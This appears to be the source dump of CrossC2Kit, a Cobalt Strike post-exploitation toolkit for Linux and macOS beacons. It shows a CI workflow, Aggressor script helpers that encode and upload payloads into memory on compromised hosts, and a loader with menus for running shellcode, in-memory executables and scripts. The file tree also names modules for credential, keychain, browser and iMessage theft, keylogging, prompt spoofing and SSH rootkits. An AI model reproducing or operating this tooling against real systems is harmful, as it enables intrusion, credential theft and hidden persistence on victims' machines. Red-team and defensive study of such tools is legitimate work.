├── .github └── workflows │ └── prcheck.yml ├── CrossC2Kit.cna ├── CrossC2Kit_Loader.cna ├── LICENSE ├── README.md ├── README_zh.md ├── compile.sh ├── gather ├── browser │ ├── cc2_chrome_dump.dylib │ ├── cc2_safari_dump.dylib │ └── safari_dump.cna ├── keychain │ ├── cc2_keychain_dump │ ├── cc2_keychain_list.dylib │ └── keychain_dump.cna ├── keylogger │ └── osx │ │ ├── cc2_keylogger.dylib │ │ └── keylogger_osx2.cna ├── message │ ├── cc2_iMessage_dump.dylib │ └── iMessage_dump.cna ├── password │ └── mimipenguin │ │ ├── cc2_mimipenguin.cna │ │ ├── mimipenguin.so │ │ └── mimipenguin32.so └── prompt │ └── osx │ ├── cc2_prompt_spoof.dylib │ └── cc2_prompt_spoof_dylib.cna ├── init └── setup.cna ├── jobs ├── cc2_jobs.cna ├── cc2_jobs.dylib ├── cc2_jobs.so └── cc2_jobs32.so ├── media ├── 15854585486601 │ └── 15854593957704.jpg └── 16295280892271 │ ├── 16295284817531.jpg │ ├── 16295285029337.jpg │ ├── 16547563992094.jpg │ └── 16547565084907.jpg ├── patch ├── install_name_tool ├── libpatchelf.so └── libpatchelf32.so ├── process ├── libinjector64.so └── processhelper.cna ├── proxy └── frp │ ├── cc2_frp.cna │ ├── crossc2_frp.dylib │ └── crossc2_frp.so ├── rootkit └── auth │ ├── auth_rootkit_mgr.so │ ├── auth_rootkit_mgr32.so │ ├── auth_rootkit_module.so │ ├── auth_rootkit_module32.so │ ├── auth_rootkit_remove.so │ ├── auth_rootkit_remove32.so │ ├── cc2_auth.cna │ ├── cc2_ssh.cna │ ├── ssh_rootkit.dylib │ ├── ssh_rootkit_mgr.dylib │ ├── ssh_rootkit_mgr.so │ ├── ssh_rootkit_mgr32.so │ ├── ssh_rootkit_module.so │ └── ssh_rootkit_module32.so ├── scanner └── ServerScan │ ├── linux │ ├── ELF │ │ ├── portscan │ │ ├── portscan386 │ │ ├── serverscan │ │ └── serverscan386 │ └── SO │ │ ├── crossc2_portscan.so │ │ └── crossc2_serverscan.so │ └── serverscan.cna ├── script ├── python-import.cna └── runScript.cna ├── spawn ├── runshellcode.cna ├── runshellcode.dylib ├── runshellcode.so └── runshellcode32.so ├── sshpass ├── sshpass.cna └── sshpass64 ├── third-party └── readme.md ├── update_site ├── SSLUtils.jar ├── httprequest.cna └── update_site.cna └── utils ├── cc2FilesColor.cna ├── cc2ProcessColor.cna ├── logvis.cna ├── modifyMetaData.cna ├── portscan_result.cna └── setEnv.cna /.github/workflows/prcheck.yml: -------------------------------------------------------------------------------- 1 | on: 2 | pull_request: 3 | branches: [main] 4 | 5 | name: Pull Requests Check 6 | 7 | jobs: 8 | job1: 9 | name: PR Check (linux) 10 | runs-on: ubuntu-18.04 11 | steps: 12 | - name: Checkout code 13 | uses: actions/checkout@v2 14 | - name: Build project 15 | id: build 16 | run: | 17 | uname -a 18 | cp -r third-party /tmp/third-party 19 | cp compile.sh /tmp/ 20 | cd /tmp 21 | chmod 755 compile.sh 22 | ./compile.sh > /tmp/elog 23 | find /tmp/third-party/ >> /tmp/elog 24 | echo "::set-output name=res::$(uname -a)" 25 | - name: Build project 26 | run: | 27 | echo "# Arch" >> $GITHUB_STEP_SUMMARY 28 | echo "\`${{ steps.build.outputs.res }}\`" >> $GITHUB_STEP_SUMMARY 29 | echo "# Build Result" >> $GITHUB_STEP_SUMMARY 30 | echo "" >> $GITHUB_STEP_SUMMARY 31 | echo "\`\`\`python" >> $GITHUB_STEP_SUMMARY 32 | cat /tmp/elog >> $GITHUB_STEP_SUMMARY 33 | echo "\`\`\`" >> $GITHUB_STEP_SUMMARY 34 | 35 | job2: 36 | name: PR Check (macOS) 37 | runs-on: macOS-10.15 38 | steps: 39 | - name: Checkout code 40 | uses: actions/checkout@v3 41 | - name: Build project 42 | id: build2 43 | run: | 44 | uname -a 45 | cp -r third-party /tmp/third-party 46 | cp compile.sh /tmp/ 47 | cd /tmp 48 | chmod 755 compile.sh 49 | ./compile.sh > /tmp/elog 50 | find /tmp/third-party/ >> /tmp/elog 51 | echo "::set-output name=res::$(uname -a)" 52 | - name: Build project 53 | run: | 54 | echo "# Arch" >> $GITHUB_STEP_SUMMARY 55 | echo "\`${{ steps.build2.outputs.res }}\`" >> $GITHUB_STEP_SUMMARY 56 | echo "# Build Result" >> $GITHUB_STEP_SUMMARY 57 | echo "" >> $GITHUB_STEP_SUMMARY 58 | echo "\`\`\`python" >> $GITHUB_STEP_SUMMARY 59 | cat /tmp/elog >> $GITHUB_STEP_SUMMARY 60 | echo "\`\`\`" >> $GITHUB_STEP_SUMMARY 61 | -------------------------------------------------------------------------------- /CrossC2Kit.cna: -------------------------------------------------------------------------------- 1 | sub random_string { 2 | # <3 @offsec_ginger 3 | $limit = $1; 4 | @random_str = @(); 5 | $characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 6 | for ($x = 0; $x < $limit; $x++) { 7 | $n = rand(strlen($characters)); 8 | add(@random_str, charAt($characters, $n)); 9 | } 10 | return join('', @random_str); 11 | } 12 | 13 | sub runType { 14 | $type = lc($1); 15 | if ($type eq "elf" || $type eq "macho" || $type eq "elf/macho") { 16 | return "0"; 17 | } else if ($type eq "so" || $type eq "dylib" || $type eq "so/dylib") { 18 | return "1"; 19 | } 20 | return -1; 21 | } 22 | 23 | 24 | 25 | sub genTaskinfo_dyn { 26 | $taskType = $1; 27 | $taskAliasName = $2; 28 | $taskResType = $3; 29 | $taskNeedRun = lc($4); 30 | if ($taskNeedRun eq "y" || $taskNeedRun eq "yes") { 31 | $taskNeedRun = "Y"; 32 | } else { 33 | $taskNeedRun = "N"; 34 | } 35 | $taskNeedPersistence = lc($5); 36 | if ($taskNeedPersistence eq "y" || $taskNeedPersistence eq "yes") { 37 | $taskAliasName = $taskAliasName . "\$\$"; 38 | } 39 | $taskXorKey = $6; 40 | $juicySize = $7; 41 | $transportArg = $8; 42 | 43 | $taskName = random_string(8); 44 | 45 | if ($taskResType eq "no-info") { 46 | $taskResType = "98765"; 47 | } 48 | 49 | 50 | $taskinfo = "CrossC2@^" . $taskType . "^" . $taskNeedRun . "^". $taskName . "^". $taskAliasName . "^" . $taskResType . "^" . $juicySize . "^" . $transportArg; 51 | return $taskinfo; 52 | } 53 | 54 | 55 | sub genMemScriptInfo { 56 | $scriptType = $1; 57 | $scriptEngPath = $2; 58 | $taskResType = $3; 59 | $juicySize = $4; 60 | $transportArg = $5; 61 | 62 | $taskinfo = "CC2-PyScript^" . $scriptType . "^". $scriptEngPath . "^" . $taskResType . "^" . $juicySize . "^" . $transportArg; 63 | return $taskinfo; 64 | } 65 | 66 | sub scriptArgsHook { 67 | local('$scriptType @args $hook_header'); 68 | $scriptType = $1; 69 | @args = $2; 70 | $hook_header = ""; 71 | 72 | if ($scriptType eq "python") { 73 | $hook_header = "import sys\nsys.argv=["; 74 | foreach $index => $value (@args) { 75 | $hook_header = $hook_header."'".$value."',"; 76 | } 77 | $hook_header = $hook_header.']'; 78 | } else if ($scriptType eq "zsh") { 79 | $hook_header = ""; 80 | foreach $index => $value (@args) { 81 | $hook_header = $hook_header.$index."=\"".$value."\"\n"; 82 | } 83 | } else if ($scriptType eq "bash") { 84 | $hook_header = "set -- "; 85 | foreach $index => $value (@args) { 86 | if ($index == 0) { 87 | continue; 88 | } 89 | # $hook_header = $hook_header."BASH_ARGV".$index."=\"".$value."\"\n"; 90 | $hook_header = $hook_header."\"".$value."\" "; 91 | } 92 | } else if ($scriptType eq "perl") { 93 | 94 | } else if ($scriptType eq "ruby") { 95 | 96 | } else if ($scriptType eq "php") { 97 | 98 | } 99 | $hook_header = $hook_header."\n"; 100 | # println($hook_header); 101 | 102 | return $hook_header; 103 | } 104 | 105 | sub transportArg { 106 | $arg = ""; 107 | foreach $index => $value (@_) { 108 | if ($index != 0) { 109 | $arg = $arg . "^" .$value; 110 | } 111 | } 112 | return base64_encode($arg); 113 | } 114 | 115 | sub transportArgs { 116 | $afterIndex = int($1) - 1; 117 | $arg = ""; 118 | foreach $index => $value ($2) { 119 | if ($index > $afterIndex) { 120 | if ($arg eq "") { 121 | $arg = $value; 122 | } else { 123 | $arg = $arg . "^" .$value; 124 | } 125 | } 126 | } 127 | return base64_encode($arg); 128 | } 129 | 130 | sub transportArgsArray { 131 | $afterIndex = int($1) - 1; 132 | @arg = @(); 133 | foreach $index => $value ($2) { 134 | if ($index > $afterIndex) { 135 | push(@arg,$value); 136 | } 137 | } 138 | return @arg; 139 | } 140 | 141 | 142 | sub transportStrings { 143 | $afterIndex = int($1) - 1; 144 | $arg = ""; 145 | $flag = 1; 146 | foreach $index => $value ($2) { 147 | if ($index > $afterIndex+1) { 148 | if ($flag == 1) { 149 | $arg = $arg.$value; 150 | $flag = 0; 151 | } else { 152 | $arg = $arg." ".$value; 153 | } 154 | } 155 | } 156 | return $arg; 157 | } 158 | 159 | sub bcrossc2_load_dyn_pro { 160 | local('$beaconid $taskType $taskName $taskResType $taskNeedRun $taskNeedPersistence $taskXorKey $loadFileName $taskArgs'); 161 | local('$loadFilePath $juicySize $handle $juicyData $ELFName'); 162 | $beaconid = $1; 163 | $taskType = $2; 164 | $taskName = $3; 165 | $taskResType = $4; 166 | $taskNeedRun = $5; 167 | $taskNeedPersistence = $6; 168 | $taskXorKey = $7; 169 | $loadFileName = $8; 170 | $taskArgs = $9; 171 | 172 | $loadFilePath = script_resource($loadFileName); 173 | $juicySize = lof(script_resource($loadFileName)); 174 | if ($juicySize <= 0) { 175 | $loadFilePath = $loadFileName; 176 | } 177 | 178 | $handle = openf($loadFilePath); 179 | $juicyData = readb($handle, -1); 180 | closef($handle); 181 | 182 | $juicySize = lof($loadFilePath); 183 | $taskType = runType($taskType); 184 | if ($taskType == -1) { 185 | berror($beaconid, "[ CrossC2 ]: dynamic lib or executable filetype not found"); 186 | } 187 | $ELFName = genTaskinfo_dyn($taskType, $taskName, $taskResType, $taskNeedRun, $taskNeedPersistence, $taskXorKey, $juicySize, $taskArgs); 188 | bupload_raw!($beaconid,$ELFName,$juicyData); 189 | } 190 | 191 | sub bcrossc2_load_dyn { 192 | $beaconid = $1; 193 | $taskType = $2; 194 | $taskName = $3; 195 | $taskResType = $4; 196 | $taskNeedRun = "Y"; 197 | $taskNeedPersistence = "N"; 198 | $taskXorKey = "2"; 199 | $loadFileName = $5; 200 | $taskArgs = base64_encode($6); 201 | 202 | $loadFilePath = script_resource($loadFileName); 203 | $juicySize = lof(script_resource($loadFileName)); 204 | if ($juicySize <= 0) { 205 | $loadFilePath = $loadFileName; 206 | } 207 | 208 | $handle = openf($loadFilePath); 209 | $juicyData = readb($handle, -1); 210 | closef($handle); 211 | 212 | $juicySize = lof($loadFilePath); 213 | $taskType = runType($taskType); 214 | if ($taskType == -1) { 215 | berror($beaconid, "[ CrossC2 ]: dynamic lib or executable filetype not found"); 216 | } 217 | $ELFName = genTaskinfo_dyn($taskType, $taskName, $taskResType, $taskNeedRun, $taskNeedPersistence, $taskXorKey, $juicySize, $taskArgs); 218 | bupload_raw!($beaconid,$ELFName,$juicyData); 219 | } 220 | 221 | sub brun_script_in_mem { 222 | $beaconid = $1; 223 | $scriptType = $2; 224 | $scriptEngPath = $3; 225 | $taskResType = $4; 226 | $loadFileName = $5; 227 | @taskArgs = $6; 228 | 229 | $loadFilePath = script_resource($loadFileName); 230 | $juicySize = lof(script_resource($loadFileName)); 231 | if ($juicySize <= 0) { 232 | $loadFilePath = $loadFileName; 233 | } 234 | 235 | $handle = openf($loadFileName); 236 | $juicyData = readb($handle, -1); 237 | closef($handle); 238 | 239 | $juicySize = lof($loadFileName); 240 | 241 | $scriptName = genMemScriptInfo($scriptType, $scriptEngPath, $taskResType, $juicySize, ""); 242 | # blog($beaconid, "[brun_script_in_mem]: args = ".@taskArgs); 243 | 244 | $header = scriptArgsHook($scriptType, @taskArgs); 245 | 246 | bupload_raw!($beaconid,$scriptName,$header.$juicyData); 247 | } 248 | 249 | 250 | sub CrossC2MemScriptEng { 251 | $taskResType = $2; # info -> normal message 252 | 253 | $beaconid = $3[0]; 254 | $scriptType = $1; 255 | $scriptEnginePath = 'null'; 256 | 257 | $contentType = $3[1]; 258 | $scriptLocalPath = $3[1]; 259 | $transportArg = $3[1]; 260 | 261 | $juicySize = lof($scriptLocalPath); 262 | if ($juicySize == 0) { 263 | $scriptLocalPath = "cc2_".$scriptType."_".random_string(6); 264 | $transportArg = 'null'; 265 | $data = transportStrings(1, $3); 266 | $out = openf(">" . $scriptLocalPath); 267 | writeb($out, $data); 268 | closef($out); 269 | brun_script_in_mem($beaconid, $scriptType, $scriptEnginePath, $taskResType, $scriptLocalPath, @()); 270 | deleteFile($scriptLocalPath); 271 | } else { 272 | @args = transportArgsArray(2, $3); 273 | $pathIndex = lindexOf($scriptLocalPath, '/'); 274 | $pathIndex += 1; 275 | $filename = substr($scriptLocalPath, $pathIndex); 276 | add(@args, $filename); 277 | blog($beaconid, "[cc2_memScript]: ".@args); 278 | brun_script_in_mem($beaconid, $scriptType, $scriptEnginePath, $taskResType, $scriptLocalPath, @args); 279 | } 280 | 281 | } 282 | 283 | sub bset_metadata { 284 | local('$beaconid $metadata_key $metadata_value'); 285 | $bid = $1; 286 | $metadata_key = $2; 287 | $metadata_value = $3; 288 | 289 | binput($bid, "$metadata_key $metadata_value"); 290 | bshell($bid, "$metadata_key $metadata_value"); 291 | } 292 | 293 | sub bsetostype { 294 | local('$bid $ostype'); 295 | $bid = $1; 296 | $ostype = $2; 297 | 298 | bset_metadata($bid, "setostype", $ostype); 299 | } 300 | 301 | sub bsetlocalip { 302 | local('$bid $localip'); 303 | $bid = $1; 304 | $localip = $2; 305 | 306 | bset_metadata($bid, "setlocalip", $localip); 307 | } 308 | 309 | sub bsethostname { 310 | local('$bid $hostname'); 311 | $bid = $1; 312 | $hostname = $2; 313 | 314 | bset_metadata($bid, "sethostname", $hostname); 315 | } 316 | 317 | sub bcc2_setenv { 318 | if($1 && $2 && $3){ 319 | binput($1, "shell setenv $2 $3"); 320 | bshell($1, "setenv $2 $3"); 321 | } else { 322 | berror($1, "*[error]: setenv env_name env_value"); 323 | } 324 | } 325 | 326 | sub bcc2_unsetenv { 327 | if($1 && $2) { 328 | binput($1, "shell unsetenv $2"); 329 | bshell($1, "unsetenv $2"); 330 | } else { 331 | berror($1, "*[error]: unsetenv env_name"); 332 | } 333 | } 334 | 335 | sub bcc2_spawn { 336 | binput($1, "shell spawn"); 337 | bshell($1, "spawn"); 338 | } 339 | 340 | sub bcc2_getsystem { 341 | binput($1, "shell getsystem"); 342 | bshell($1, "getsystem"); 343 | } 344 | 345 | @fileupload_list = @(); 346 | global(@fileupload_list); 347 | sub bawait_upload { 348 | local('$bid $file_lpath $file_rpath $file_rname $file_data $file_size $cb $handle $file_list_count'); 349 | $bid = $1; 350 | $file_lpath = $2; 351 | $file_rpath = $3; 352 | $file_rname = $4; 353 | $cb = $5; 354 | $cb_args = $6; 355 | $handle = openf($file_lpath); 356 | $file_data = readb($handle, -1); 357 | closef($handle); 358 | $file_size = lof($file_lpath); 359 | 360 | btask($bid, 'upload file '.$file_lpath.' to '.$file_rpath.$file_rname); 361 | 362 | $file_list_count = size(@fileupload_list); 363 | add(@fileupload_list, @($bid, $file_lpath, $file_rpath, $file_rname, $file_size, $cb, $cb_args, 'false' 'false')); 364 | bupload_raw!($bid, $file_rpath.'/'.$file_rname, $file_data); 365 | } 366 | 367 | sub bawait_upload_raw { 368 | local('$bid $file_lpath $file_rpath $file_rname $file_data $file_size $cb $handle $file_list_count'); 369 | $bid = $1; 370 | $file_data = $2; 371 | $file_rpath = $3; 372 | $file_rname = $4; 373 | $cb = $5; 374 | $cb_args = $6; 375 | $file_size = strlen($file_data); 376 | $file_lpath = random_string(10); 377 | 378 | btask($bid, 'upload rawData file-['.$file_lpath.'] to '.$file_rpath.$file_rname); 379 | 380 | $file_list_count = size(@fileupload_list); 381 | add(@fileupload_list, @($bid, $file_lpath, $file_rpath, $file_rname, $file_size, $cb, $cb_args, 'false' 'false')); 382 | bupload_raw!($bid, $file_rpath.'/'.$file_rname, $file_data); 383 | } 384 | 385 | sub bcheck_file_size { 386 | this('$bid $file_path $file_name $file_size $realsize $name $temp $f_rname $f_match_size '); 387 | $bid = $1; 388 | $file_path = $2; 389 | $file_name = $3; 390 | $file_size = $4; 391 | 392 | bls($bid, $file_path, lambda({ 393 | this('@lines @subl $type $s $lastmod $name'); 394 | this('$file_name $file_size $realsize $f_key $f_value $f_rname') 395 | @lines = split("\n", ["$3" trim]); 396 | @subl = sublist(@lines, 1); 397 | foreach $temp (@subl) { 398 | ($type, $s, $lastmod, $name) = split("\t", $temp); 399 | if ($name eq $file_name) { 400 | $realsize = long($s); 401 | if ($realsize >= $file_size) { 402 | foreach $f_key => $f_value (@fileupload_list) { 403 | $f_rname = $f_value[3]; 404 | if ($name eq $f_rname) { 405 | @fileupload_list[$f_key][7] = 'true'; 406 | break; 407 | } 408 | } 409 | } 410 | break; 411 | } 412 | } 413 | }, $file_name => $file_name, $file_size => $file_size) 414 | ); 415 | } 416 | on heartbeat_1s { 417 | local('$f_key $f_value $f_bid $f_lpath $f_rpath $f_rname $f_size $f_func $f_match_size'); 418 | if (size(@fileupload_list) > 0) { 419 | foreach $f_key => $f_value (@fileupload_list) { 420 | $f_bid = $f_value[0]; 421 | $f_lpath = $f_value[1]; 422 | $f_rpath = $f_value[2]; 423 | $f_rname = $f_value[3]; 424 | $f_size = $f_value[4]; 425 | $f_cb = $f_value[5]; 426 | $f_cb_args = $f_value[6]; 427 | $f_match_size = $f_value[7]; 428 | $f_cb_runed = $f_value[8]; 429 | 430 | if ($f_match_size eq 'false') { 431 | bcheck_file_size($f_bid, $f_rpath, $f_rname, $f_size); 432 | } 433 | if ($f_match_size eq 'true') { 434 | if ($f_cb_runed eq 'false') { 435 | @fileupload_list[$f_key][8] = 'true'; 436 | [$f_cb: $f_bid, $f_cb_args]; 437 | break; 438 | } 439 | } 440 | } 441 | foreach $f_key => $f_value (@fileupload_list) { 442 | $f_match_size = $f_value[7]; 443 | if ($f_match_size eq 'true') { 444 | removeAt(@fileupload_list, int($f_key)); 445 | break; 446 | } 447 | } 448 | } 449 | } 450 | 451 | ssh_alias list_uploadingFile { 452 | println(@fileupload_list); 453 | $bid = $1; 454 | local('$f_key $f_value $f_bid $f_lpath $f_rpath $f_rname $f_size $f_func $f_match_size'); 455 | if (size(@fileupload_list) > 0) { 456 | foreach $f_key => $f_value (@fileupload_list) { 457 | $f_bid = $f_value[0]; 458 | $f_lpath = $f_value[1]; 459 | $f_rpath = $f_value[2]; 460 | $f_rname = $f_value[3]; 461 | $f_size = $f_value[4]; 462 | $f_cb = $f_value[5]; 463 | $f_cb_args = $f_value[6]; 464 | $f_match_size = $f_value[7]; 465 | $f_cb_runed = $f_value[8]; 466 | blog($bid, $f_lpath); 467 | } 468 | } 469 | } 470 | 471 | sub getCrossC2Site { 472 | local('%beacon_site $beacon_count $Description, $Proto, $Host, $Port, $URI'); 473 | %beacon_site = %(); 474 | $beacon_count = 0; 475 | foreach $site_list(sites()) { 476 | ($Description, $Proto, $Host, $Port, $URI) = values($site_list, @('Description', 'Proto', 'Host', 'Port', 'URI')); 477 | if ("CrossC2" isin $Description) { 478 | $beaconURL = $Proto.$Host.':'.$Port.$URI; 479 | # 返回beacon_uri & beacon_description 480 | %beacon_site[$beacon_count] = @($Description, $beaconURL); 481 | $beacon_count += 1; 482 | } 483 | } 484 | return %beacon_site; 485 | } 486 | 487 | sub getCrossC2Listener { 488 | local('%beacon_listener $beacon_count'); 489 | %beacon_listener = %(); 490 | $beacon_count = 0; 491 | foreach $listener(listeners_local()) { 492 | if ("CrossC2" isin $listener) { 493 | %beacon_listener[$beacon_count] = @($listener); 494 | $beacon_count += 1; 495 | } 496 | } 497 | return %beacon_listener; 498 | } 499 | 500 | sub getSSHSession { 501 | local('%sessionMap $sessionCount'); 502 | %sessionMap = %(); 503 | $sessionCount = 0; 504 | foreach $beacon (beacons()) { 505 | ($internal, $computer) = values($beacon, @('internal', 'computer')); 506 | $tempMenuBar = $internal."@".$computer; 507 | if (!-isactive $beacon['id']) { 508 | } else if (-isssh $beacon['id']) { 509 | %sessionMap[$sessionCount] = @($tempMenuBar); 510 | $sessionCount += 1; 511 | } 512 | } 513 | return %sessionMap; 514 | } 515 | 516 | sub getCrossC2Beacon { 517 | local('$listener $type $beaconData'); 518 | $listener = $1; 519 | $type = $2; 520 | 521 | $beaconData = $null; 522 | if ($listener && $type) { 523 | if ($type eq 'lib') { 524 | $beaconData = listener_info($listener)['CrossC2libBeacon']; 525 | } else if ($type eq 'main') { 526 | $beaconData = listener_info($listener)['CrossC2Beacon']; 527 | } 528 | } 529 | return $beaconData; 530 | } -------------------------------------------------------------------------------- /CrossC2Kit_Loader.cna: -------------------------------------------------------------------------------- 1 | include(script_resource("init/setup.cna")); 2 | include(script_resource("jobs/cc2_jobs.cna")); 3 | include(script_resource("script/runScript.cna")); 4 | include(script_resource("script/python-import.cna")); 5 | include(script_resource("proxy/frp/cc2_frp.cna")); 6 | include(script_resource("rootkit/auth/cc2_ssh.cna")); 7 | include(script_resource("rootkit/auth/cc2_auth.cna")); 8 | #include(script_resource("scanner/ServerScan/serverscan.cna")); 9 | include(script_resource("gather/password/mimipenguin/cc2_mimipenguin.cna")); 10 | include(script_resource("gather/prompt/osx/cc2_prompt_spoof_dylib.cna")); 11 | include(script_resource("gather/keylogger/osx/keylogger_osx2.cna")); 12 | include(script_resource("gather/browser/safari_dump.cna")); 13 | include(script_resource("gather/browser/chrome_dump.cna")); 14 | include(script_resource("gather/keychain/keychain_dump.cna")); 15 | include(script_resource("gather/message/iMessage_dump.cna")); 16 | include(script_resource("process/processhelper.cna")); 17 | include(script_resource("sshpass/sshpass.cna")); 18 | include(script_resource("update_site/update_site.cna")); 19 | include(script_resource("utils/cc2FilesColor.cna")); 20 | include(script_resource("utils/cc2ProcessColor.cna")); 21 | include(script_resource("utils/portscan_result.cna")); 22 | include(script_resource("utils/setEnv.cna")); 23 | include(script_resource("utils/modifyMetaData.cna")); 24 | include(script_resource("utils/logvis.cna")); 25 | include(script_resource("spawn/runshellcode.cna")); 26 | 27 | popup ssh_bottom { 28 | menu "Inveigh"{ 29 | item "Run Inveigh"{ 30 | } 31 | } 32 | } 33 | 34 | sub openMemoryFileLoadDialogCallBack { 35 | $taskFile = $3['taskFile']; 36 | $fileAliasName = $3['fileAliasName']; 37 | $taskType = $3['taskType']; 38 | $taskResType = $3['taskResType']; 39 | $taskNeedRun = $3['taskNeedRun']; 40 | $taskNeedPersistence = $3['taskNeedPersistence']; 41 | $taskXorKey = $3['taskXorKey']; 42 | 43 | $transportArg = ""; 44 | bcrossc2_load_dyn_pro($beaconid, $taskType, $fileAliasName, $taskResType, $taskNeedRun, $taskNeedPersistence, $taskXorKey, $taskFile, $transportArg); 45 | } 46 | 47 | sub openMemoryFileLoadDialog { 48 | $beaconid = $1; 49 | $dialog = dialog("MemoryFile Loader", %(beaconid => $beaconid, taskFile => "", fileAliasName => "", taskType => "", taskResType => "", taskNeedRun => "", taskNeedPersistence => "yes", taskXorKey => "13"), &openMemoryFileLoadDialogCallBack); 50 | dialog_description($dialog, "load file to memory"); 51 | 52 | # fileAliasName // 别名 53 | # fileName //真实文件名 -> 文件浏览器中获取 54 | # taskType = "so"; 文件类型 / 选择器 55 | # taskResType = "info"; # 文件执行结果 / 选择器 56 | # taskNeedRun = "Y"; # taskNeedRun -> Y / N 57 | # taskNeedPersistence = "N"; # taskNeedPersistence -> Y / N 58 | # taskXorKey = 13; # taskXorKey 文件内容Xor加密key 59 | 60 | drow_file($dialog, "taskFile", "Choose: "); 61 | drow_text($dialog, "fileAliasName", "fileAliasName: ", "fileAliasName"); # 这里为木马下发的别名 62 | drow_combobox($dialog, "taskType", "taskType: ", @("so/dylib", "ELF/MachO")); 63 | drow_combobox($dialog, "taskResType", "taskResType: ", @("info", "portscan", "credentials", "keystrokes", "screenshot", "no-info")); 64 | drow_combobox($dialog, "taskNeedRun", "taskNeedRun: ", @("no", "yes")); 65 | $taskNeedPersistence = "Y"; 66 | drow_text($dialog, "taskXorKey", "taskXorKey(1-255): ", 13); # 这里的xorKey可以改为随机 67 | 68 | dbutton_action($dialog, "load"); 69 | dialog_show($dialog); 70 | } 71 | 72 | sub openPythonImportDialogDialogCallBack { 73 | $pythonFile = $3['pythonFile']; 74 | binput($beaconid, $pythonFile); 75 | $taskResType = "info"; # info -> normal message 76 | $scriptType = 'python-import$'; 77 | $scriptEnginePath = 'null'; 78 | $scriptLocalPath = $pythonFile; 79 | $transportArg = ''; 80 | 81 | $pathIndex = lindexOf($scriptLocalPath, '/'); 82 | $pathIndex += 1; 83 | $filename = substr($scriptLocalPath, $pathIndex); 84 | 85 | $importName = substr($filename, 0, lindexOf($filename, '.')); 86 | btask($1, "[Python]: import ".$importName); 87 | $scriptType = $scriptType.$importName; 88 | 89 | if ($scriptType && $scriptLocalPath) { 90 | if (indexOf($scriptType, "/")) { 91 | $scriptEnginePath = $scriptType; 92 | } 93 | brun_script_in_mem($beaconid, $scriptType, $scriptEnginePath, $taskResType, $scriptLocalPath, @()); 94 | } else { 95 | berror($beaconid, "*[error]: error script load"); 96 | printUsage_importscript($beaconid); 97 | } 98 | } 99 | 100 | sub openPythonImportDialog { 101 | $beaconid = $1; 102 | $dialog = dialog("Python-import", %(beaconid => $beaconid, pythonFile => ""), &openPythonImportDialogDialogCallBack); 103 | dialog_description($dialog, "import python file"); 104 | 105 | drow_file($dialog, "pythonFile", "Choose *.py file: "); 106 | 107 | dbutton_action($dialog, "load"); 108 | dialog_show($dialog); 109 | } 110 | 111 | 112 | sub openRunMemoryFileDialogCallBack { 113 | $fileAliasName = $3['fileAliasName']; 114 | $processName = $3['processName']; 115 | $taskArgs = $3['taskArgs']; 116 | $taskType = runType($3['taskType']); 117 | if ($taskType eq "0") { 118 | $shell = "cc2-run ".$fileAliasName." ".$processName." ".$taskArgs; 119 | } else { 120 | $shell = "cc2-run ".$fileAliasName." ".$taskArgs; 121 | } 122 | binput($beaconid, "shell ".$shell); 123 | bshell($beaconid, $shell); 124 | } 125 | 126 | sub openRunMemoryFileDialog { 127 | $beaconid = $1; 128 | $dialog = dialog("Run MemoryFile", %(beaconid => $beaconid, fileAliasName => "fileAliasName", processName => "processName (ELF/MachO need)", taskType => "", taskArgs => "taskArgs"), &openRunMemoryFileDialogCallBack); 129 | dialog_description($dialog, "run executable file from memory"); 130 | 131 | drow_text($dialog, "fileAliasName", "fileAliasName: ", "fileAliasName"); 132 | drow_text($dialog, "processName", "processName: ", "processName"); 133 | drow_combobox($dialog, "taskType", "taskType: ", @("ELF/MachO", "so/dylib")); 134 | drow_text($dialog, "taskArgs", "taskArgs: ", "taskArgs"); 135 | 136 | dbutton_action($dialog, "load"); 137 | dialog_show($dialog); 138 | } 139 | 140 | popup ssh { 141 | separator(); 142 | menu "&Access" { 143 | item "&Elevate" { openElevateDialog($1); } 144 | } 145 | menu "&CrossC2 Kit" { 146 | menu "&Process" { 147 | menu "&executable" { 148 | item "&list" { 149 | binput($1, "shell cc2-memoryList"); 150 | bshell($1, "cc2-memoryList"); 151 | } 152 | item "&load" { 153 | openMemoryFileLoadDialog($1); 154 | } 155 | item "&run" { 156 | openRunMemoryFileDialog($1); 157 | } 158 | #item "&unload" { 159 | #} 160 | } 161 | foreach $bid ($1) { 162 | $f_shellcode_status = cc2_shellcode_status($bid); 163 | if ($f_shellcode_status) { 164 | item "&run shellcode" { 165 | openShellCodeDialog($bid); 166 | } 167 | } 168 | } 169 | } 170 | menu "&ENV" { 171 | item "&setenv" { 172 | openSetEnvDialog($1); 173 | } 174 | item "&unsetenv" { 175 | openUnSetEnvDialog($1); 176 | } 177 | } 178 | menu "&Script" { 179 | item "&python-import" { 180 | openPythonImportDialog($1); 181 | } 182 | item "&run script" { 183 | foreach $bid ($1) { 184 | openRunScriptDialog($bid); 185 | } 186 | } 187 | } 188 | menu "Job Manager" { 189 | item "List" { 190 | openJobDialog($1, @("list")); 191 | } 192 | item "Kill" { 193 | openJobDialog($1, @("kill")); 194 | } 195 | item "Kill All" { 196 | openJobDialog($1, @("kill", "all")); 197 | } 198 | } 199 | separator(); 200 | menu "Modify MetaData" { 201 | menu "&Operating System" { 202 | item "&Android" { openModifyMetaData($1, "setostype", "android"); } 203 | item "Apple &iOS" { openModifyMetaData($1, "setostype", "Apple iOS"); } 204 | item "&Cisco IOS" { openModifyMetaData($1, "setostype", "Cisco IOS"); } 205 | item "Fire&wall" { openModifyMetaData($1, "setostype", "Firewall"); } 206 | item "&FreeBSD" { openModifyMetaData($1, "setostype", "FreeBSD"); } 207 | item "&Linux" { openModifyMetaData($1, "setostype", "Linux"); } 208 | item "&MacOS X" { openModifyMetaData($1, "setostype", "MacOS X"); } 209 | item "&NetBSD" { openModifyMetaData($1, "setostype", "NetBSD"); } 210 | item "&OpenBSD" { openModifyMetaData($1, "setostype", "OpenBSD"); } 211 | item "&Printer" { openModifyMetaData($1, "setostype", "Printer"); } 212 | item "&Solaris" { openModifyMetaData($1, "setostype", "Solaris"); } 213 | item "&Unknown" { openModifyMetaData($1, "setostype", "Unknown"); } 214 | item "&VMware" { openModifyMetaData($1, "setostype", "VMware"); } 215 | menu "&Windows" { 216 | item "1. 95/98/2000" { openModifyMetaData($1, "setostype", "Windows"); } 217 | item "2. XP/2003" { openModifyMetaData($1, "setostype", "Windows"); } 218 | item "3. Vista/7" { openModifyMetaData($1, "setostype", "Windows"); } 219 | item "4. 8/10/RT" { openModifyMetaData($1, "setostype", "Windows"); } 220 | } 